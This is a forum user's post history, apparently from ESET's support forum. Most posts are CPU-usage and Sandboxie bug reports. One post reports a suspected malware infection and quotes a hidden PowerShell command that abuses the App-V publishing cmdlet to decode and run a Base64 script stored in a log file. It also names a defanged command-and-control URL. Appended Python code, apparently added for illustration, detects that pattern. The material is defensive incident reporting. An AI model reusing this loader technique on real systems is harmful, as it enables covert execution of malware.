Kevin999

Members; Posts: 43; Days Won: 1

Everything posted by Kevin999

  1. BitComet using too much CPU (about 1 CPU core, i.e. ~25%) is a known issue caused by BitComet's UDP transmission thread (BT DHT network, and maybe uTP), but egui.exe sometimes also uses ~25% on my computer (Intel Core i5-4690, 4 cores). The egui.exe CPU usage bug reproduced today; it happens when staying on the Network Connection page. I'll send you the log later.
  2. I think a potential problem is: the Network Connection page has lots of connection information items. Because I am running eMule and BitComet to share files, they create a large number of TCP and UDP sessions, so egui.exe needs to update the connection information frequently, thus consuming too much CPU.
  3. Especially on the Network Connection page. If I exit on this page, egui.exe will still consume CPU after the main window closes. ESET Internet Security 16.1.14.0. By the way, egui.exe should be terminated after the main window closes.
  4. I am trying to recover SyncAppvPublishingServer.vbs from EIS' quarantine, and I will send it to you later. @Marcos
  5. Unfortunately, the real-time performance exclusion for the whole directory and the exclusion for the Sandboxie .exe in ESET Deep Behavior Inspection don't seem to work; this bug reproduced yesterday.
  6. This bug reproduced today: ekrn.exe cost >=50 CPU, and Sandboxie couldn't delete contents. Unfortunately, after I tried to unmount the RAMDisk, this bug didn't disappear, but it disappeared after reboot.
  7. Here are some discussions among Sandboxie users about CPU usage, Sandboxie and ESET: https://github.com/sandboxie-plus/Sandboxie/issues/1502
  8. This bug reproduced today: ekrn.exe cost >=50 CPU, and Sandboxie couldn't delete contents, but after I tried to unmount the RAMDisk, this bug disappeared immediately. The Sandboxie work folder is stored on the RAMDisk.
  9. This bug reproduced today. It also disappeared after restarting my computer. Besides ekrn.exe costing ≥50% CPU, sandboxed Firefox crashed; because the unsandboxed Firefox had been running for some time, it worked well. Edge could launch, but it stopped responding after a while.
  10. This bug reproduced today, but after I deleted the sandbox contents, this bug disappeared. I guess Sandboxie may conflict with EIS?
  11. This bug reproduced today. It also disappeared after restarting my computer. Besides ekrn.exe costing >=50% CPU, Edge and IE couldn't open any website (always kept loading); although Firefox had been running for some time, it also couldn't open any website. Only IE could start again after exit. These web browsers all had processes left after exit, and they couldn't be terminated by Task Manager (access denied). Besides, ping worked well.
  12. This bug reproduced today. It also disappeared after restarting my computer. Besides ekrn.exe costing >=50% CPU, Edge and IE couldn't open any website (always kept loading); because Firefox had been running for some time, it worked well. Only IE could start again after exit. These web browsers all had processes left after exit, and they couldn't be terminated by Task Manager (access denied). Besides, ping worked well.
  13. How about only disabling the PS Remoting capability (especially incoming packets) with the EIS firewall by default? Because most users may not know how to use PowerShell. https://4sysops.com/wiki/disable-powershell-remoting-disable-psremoting-winrm-listener-firewall-and-localaccounttokenfilterpolicy/#disable-the-firewall-exceptions Besides, I think Windows Remote Management is rarely used by home users; the EIS firewall could also block it by default to provide higher security.
  14. I think ESET Internet protection could block Windows Remote Management (WS-Management) by default (especially incoming packets), and add an option to allow it manually.
  15. What should I do? My computer has VMware Workstation 16 Pro (16.2.3 build-19376536) installed.
  16. The threat was detected at 25 14:42:11 and 26 06:24:28 (after system start), but it was no longer detected after that.
  17. I also used ESET SysInspector to capture a snapshot; I can upload it if needed.
  18. Yesterday, I found some strange internet traffic when I was using Wireshark. Then I used the EIS "network connection" tool and found it was created by PowerShell (I didn't run any PowerShell).

      This issue reproduced today. Conhost.exe and powershell.exe were running in the background, but I didn't run either of them. PowerShell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday); conhost didn't seem to have any network activity. I used Wireshark to capture packets, then used the filter ipv6.addr==2606:4700:3031::ac43:9c07, and found it was using HTTP/1.1 with the connect method. Please note the strange strings in X-User-Agent.

      By the way, TLS (TCP-443) and QUIC (UDP-443) connections were created when I used sandboxed Firefox to visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL visiting them !!!); these websites are using Cloudflare to protect themselves. I used ESET SysInspector to capture a snapshot.

      I used nslookup to resolve:

          C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
          DNS request timed out.
              timeout was 2 seconds.
          服务器:  UnKnown
          Address:  192.168.1.1

          DNS request timed out.
              timeout was 2 seconds.
          *** 请求 UnKnown 超时

          C:\Users\Admin>nslookup api.private-chatting.com
          DNS request timed out.
              timeout was 2 seconds.
          服务器:  UnKnown
          Address:  192.168.1.1

          非权威应答:
          名称:    api.private-chatting.com
          Addresses:  2606:4700:3032::6815:38d6
                    2606:4700:3031::ac43:9c07
                    104.21.56.214

      Today I found the command-line parameters of one of the powershell.exe processes with taskmgr (it cost about 10% CPU):

          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}

      2. Find C:\Windows\logs\system-logs.txt, and find these strings:

      Snipped: The code was moved to the attached file to squeeze the post.

      Please note $EndPointURL = "hxxp://api.private-chatting.com/connect"; it's the same as the URL in the pcapng file.

      system-logs.txt, Strange traffic_20220424.rar, system-logs.rar
  19. Now I am using Windows 10 Enterprise LTSC 2022 x64 (21H2). This bug even happened when I was using Windows 10 Enterprise LTSC 2019 x64 (1809). My Windows was a clean upgrade (deleted the system partition, EFI system partition and recovery partition), so I can confirm I have tried a complete clean install of ESET.
  20. This bug reproduced today. It also disappeared after restarting my computer. Besides ekrn.exe costing >=50% CPU, Edge and IE couldn't open any website (always kept loading) and Edge stopped responding after a moment. Firefox had been running for some time, and it was normal.
  21. This bug reproduced today. It also disappeared after restarting my computer. Besides ekrn.exe costing >=50% CPU, IE couldn't open any website (always kept loading); Firefox and Edge couldn't launch (they had processes). I will send you the dump later. By the way, I used ESET Log Collector after restarting the computer, though the dump was created first.
  22. This bug reproduced today. It also disappeared after restarting my computer. Besides ekrn.exe costing >=50% CPU, IE and Edge couldn't open any website (always kept loading); Firefox was OK. I will send you the dump later. By the way, I used ESET Log Collector after restarting the computer, though the dump was created first.
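
The command line quoted in post 18 above reads one line from a file, Base64-decodes it, and runs the result as a script block. As an added example (not part of the original posts and not ESET's detection logic), the Python below scores process command lines for that combination; the trait names, the `triage` function and the benign sample are constructed for illustration.

```python
import re

# Traits taken from the command line quoted in post 18. Each is weak alone;
# together they describe "read a staged line from a file, decode it, run it".
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "appv_publishing_cmdlet": re.compile(r"sync-appvpublishingserver", re.I),
    "reads_one_line_of_file": re.compile(
        r"get-content\s+\S+\s*\|\s*select(-object)?\s+-index\s+\d+", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
    "dynamic_scriptblock": re.compile(r"\[scriptblock\]::create", re.I),
    "executes_result": re.compile(r"invoke-command|invoke-expression|\biex\b", re.I),
}
CORE = {"base64_decode", "dynamic_scriptblock", "executes_result"}
STAGED_FILE = re.compile(r"get-content\s+(\S+)", re.I)

def triage(cmdline):
    """Return matched traits, the file the payload is read from, and a verdict."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmdline)}
    staged = STAGED_FILE.search(cmdline)
    # Require the full decode-and-execute chain plus one supporting trait,
    # so a script that merely reads a log line is not flagged.
    suspicious = CORE <= hits and len(hits) > len(CORE)
    return {
        "hits": sorted(hits),
        "staged_file": staged.group(1) if staged else None,
        "verdict": "investigate" if suspicious else "ok",
    }

# Command line as quoted in post 18 (executable path omitted).
FROM_POST = (
    r"-NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command "
    r"&{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); "
    r"import-module AppvClient; Sync-AppvPublishingServer n; "
    r"$a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;"
    r"$script_decoded = [System.Text.Encoding]::UTF8.GetString("
    r"[System.Convert]::FromBase64String($a)); "
    r"$script_block = [Scriptblock]::Create($script_decoded);"
    r"Invoke-Command $script_block}"
)
# Constructed benign sample for contrast.
BENIGN = r'powershell.exe -NoProfile -Command "Get-Content C:\Temp\build.log | Select-Object -Index 0"'

if __name__ == "__main__":
    for label, cmd in (("post 18", FROM_POST), ("benign", BENIGN)):
        print(label, triage(cmd))
```

The `staged_file` value tells a responder which file to preserve and inspect, which in post 18 is the text file holding the encoded script.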